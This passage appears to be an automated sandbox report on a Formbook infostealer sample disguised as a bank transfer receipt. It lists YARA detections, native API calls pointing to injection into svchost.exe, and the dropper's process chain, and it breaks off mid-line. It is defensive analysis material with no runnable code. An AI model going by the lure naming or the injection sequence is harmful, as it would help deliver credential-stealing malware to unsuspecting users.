Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F31DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

0_2_00F31DC7

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Code function: 0_2_00F35B88	0_2_00F35B88
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_004015E0	1_2_004015E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAD227	1_2_02AAD227
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA9248	1_2_02AA9248
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA8F8B	1_2_02AA8F8B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA969B	1_2_02AA969B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAA67E	1_2_02AAA67E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA8049	1_2_02AA8049
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAB7B8	1_2_02AAB7B8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA01F8	1_2_02AA01F8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAC112	1_2_02AAC112
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00408C6B	15_2_00408C6B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00408C70	15_2_00408C70
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB922AE	15_2_1EB922AE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB92EF7	15_2_1EB92EF7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE6E30	15_2_1EAE6E30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFEBB0	15_2_1EAFEBB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB91FF1	15_2_1EB91FF1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8DBD2	15_2_1EB8DBD2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB92B28	15_2_1EB92B28
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0	15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB920A8	15_2_1EB920A8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADB090	15_2_1EADB090
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB928EC	15_2_1EB928EC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD841F	15_2_1EAD841F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81002	15_2_1EB81002
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2581	15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADD5E0	15_2_1EADD5E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB925DD	15_2_1EB925DD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC0D20	15_2_1EAC0D20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE4120	15_2_1EAE4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACF900	15_2_1EACF900
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB92D07	15_2_1EB92D07
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB91D55	15_2_1EB91D55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A5EBB0	22_2_03A5EBB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A46E30	22_2_03A46E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A20D20	22_2_03A20D20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A44120	22_2_03A44120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A2F900	22_2_03A2F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF1D55	22_2_03AF1D55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3B090	22_2_03A3B090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1002	22_2_03AE1002
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A3841F	22_2_03A3841F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3D1FB	22_2_02D3D1FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3C944	22_2_02D3C944
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D22FB0	22_2_02D22FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D28C70	22_2_02D28C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D28C6B	22_2_02D28C6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D22D90	22_2_02D22D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D22D87	22_2_02D22D87

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Code function: String function: 1EACB150 appears 35 times

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA9248 NtAllocateVirtualMemory,	1_2_02AA9248
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AACBBD NtProtectVirtualMemory,	1_2_02AACBBD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00418680 NtReadFile,	15_2_00418680
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_004185D0 NtCreateFile,	15_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_004187B0 NtAllocateVirtualMemory,	15_2_004187B0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_0041867C NtCreateFile,NtReadFile,	15_2_0041867C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00418622 NtCreateFile,	15_2_00418622
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_004185CD NtCreateFile,	15_2_004185CD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_004187AA NtAllocateVirtualMemory,	15_2_004187AA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB096E0 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_1EB096E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09A20 NtResumeThread,LdrInitializeThunk,	15_2_1EB09A20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09A00 NtProtectVirtualMemory,LdrInitializeThunk,	15_2_1EB09A00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09660 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_1EB09660
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09A50 NtCreateFile,LdrInitializeThunk,	15_2_1EB09A50
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB097A0 NtUnmapViewOfSection,LdrInitializeThunk,	15_2_1EB097A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09780 NtMapViewOfSection,LdrInitializeThunk,	15_2_1EB09780
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09FE0 NtCreateMutant,LdrInitializeThunk,	15_2_1EB09FE0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09710 NtQueryInformationToken,LdrInitializeThunk,	15_2_1EB09710
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB098F0 NtReadVirtualMemory,LdrInitializeThunk,	15_2_1EB098F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09860 NtQuerySystemInformation,LdrInitializeThunk,	15_2_1EB09860
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09840 NtDelayExecution,LdrInitializeThunk,	15_2_1EB09840
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB099A0 NtCreateSection,LdrInitializeThunk,	15_2_1EB099A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09910 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_1EB09910
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09540 NtReadFile,LdrInitializeThunk,	15_2_1EB09540
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09A80 NtOpenDirectoryObject,	15_2_1EB09A80
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB096D0 NtCreateKey,	15_2_1EB096D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09A10 NtQuerySection,	15_2_1EB09A10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09610 NtEnumerateValueKey,	15_2_1EB09610
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09670 NtQueryInformationProcess,	15_2_1EB09670
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09650 NtQueryValueKey,	15_2_1EB09650
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0A3B0 NtGetContextThread,	15_2_1EB0A3B0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09730 NtQueryVirtualMemory,	15_2_1EB09730
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0A710 NtOpenProcessToken,	15_2_1EB0A710
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09B00 NtSetValueKey,	15_2_1EB09B00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0A770 NtOpenThread,	15_2_1EB0A770
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09770 NtSetInformationFile,	15_2_1EB09770
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09760 NtOpenProcess,	15_2_1EB09760
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB098A0 NtWriteVirtualMemory,	15_2_1EB098A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09820 NtEnumerateKey,	15_2_1EB09820
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0B040 NtSuspendThread,	15_2_1EB0B040
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB095F0 NtQueryInformationFile,	15_2_1EB095F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB099D0 NtCreateProcessEx,	15_2_1EB099D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB095D0 NtClose,	15_2_1EB095D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0AD30 NtSetContextThread,	15_2_1EB0AD30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09520 NtWaitForSingleObject,	15_2_1EB09520
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09560 NtWriteFile,	15_2_1EB09560
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB09950 NtQueueApcThread,	15_2_1EB09950
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_005279BE LdrInitializeThunk,NtProtectVirtualMemory,	15_2_005279BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00527AB1 Sleep,NtProtectVirtualMemory,	15_2_00527AB1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_005279B9 LdrInitializeThunk,NtProtectVirtualMemory,	15_2_005279B9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00527AE7 NtProtectVirtualMemory,	15_2_00527AE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69780 NtMapViewOfSection,LdrInitializeThunk,	22_2_03A69780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69FE0 NtCreateMutant,LdrInitializeThunk,	22_2_03A69FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69710 NtQueryInformationToken,LdrInitializeThunk,	22_2_03A69710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A696E0 NtFreeVirtualMemory,LdrInitializeThunk,	22_2_03A696E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A696D0 NtCreateKey,LdrInitializeThunk,	22_2_03A696D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69660 NtAllocateVirtualMemory,LdrInitializeThunk,	22_2_03A69660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69650 NtQueryValueKey,LdrInitializeThunk,	22_2_03A69650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69A50 NtCreateFile,LdrInitializeThunk,	22_2_03A69A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A699A0 NtCreateSection,LdrInitializeThunk,	22_2_03A699A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A695D0 NtClose,LdrInitializeThunk,	22_2_03A695D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,	22_2_03A69910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69540 NtReadFile,LdrInitializeThunk,	22_2_03A69540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69860 NtQuerySystemInformation,LdrInitializeThunk,	22_2_03A69860
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69840 NtDelayExecution,LdrInitializeThunk,	22_2_03A69840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A697A0 NtUnmapViewOfSection,	22_2_03A697A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6A3B0 NtGetContextThread,	22_2_03A6A3B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69730 NtQueryVirtualMemory,	22_2_03A69730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69B00 NtSetValueKey,	22_2_03A69B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6A710 NtOpenProcessToken,	22_2_03A6A710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69760 NtOpenProcess,	22_2_03A69760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69770 NtSetInformationFile,	22_2_03A69770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6A770 NtOpenThread,	22_2_03A6A770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69A80 NtOpenDirectoryObject,	22_2_03A69A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69A20 NtResumeThread,	22_2_03A69A20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69A00 NtProtectVirtualMemory,	22_2_03A69A00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69610 NtEnumerateValueKey,	22_2_03A69610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69A10 NtQuerySection,	22_2_03A69A10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69670 NtQueryInformationProcess,	22_2_03A69670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A695F0 NtQueryInformationFile,	22_2_03A695F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A699D0 NtCreateProcessEx,	22_2_03A699D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69520 NtWaitForSingleObject,	22_2_03A69520
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6AD30 NtSetContextThread,	22_2_03A6AD30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69560 NtWriteFile,	22_2_03A69560
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69950 NtQueueApcThread,	22_2_03A69950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A698A0 NtWriteVirtualMemory,	22_2_03A698A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A698F0 NtReadVirtualMemory,	22_2_03A698F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A69820 NtEnumerateKey,	22_2_03A69820
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A6B040 NtSuspendThread,	22_2_03A6B040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D38680 NtReadFile,	22_2_02D38680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D387B0 NtAllocateVirtualMemory,	22_2_02D387B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D38700 NtClose,	22_2_02D38700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D385D0 NtCreateFile,	22_2_02D385D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3867C NtCreateFile,NtReadFile,	22_2_02D3867C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D38622 NtCreateFile,	22_2_02D38622
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D387AA NtAllocateVirtualMemory,	22_2_02D387AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D385CD NtCreateFile,	22_2_02D385CD

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 61538 bytes, 1 file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Process Stats: CPU usage > 98%

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Binary or memory string: OriginalFilename vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000003.294702939.000000000343E000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenongrav.exe vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000000.293866460.0000000000F3A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nongrav.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Metadefender: Detection: 14%
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	ReversingLabs: Detection: 26%

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe "C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe"
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
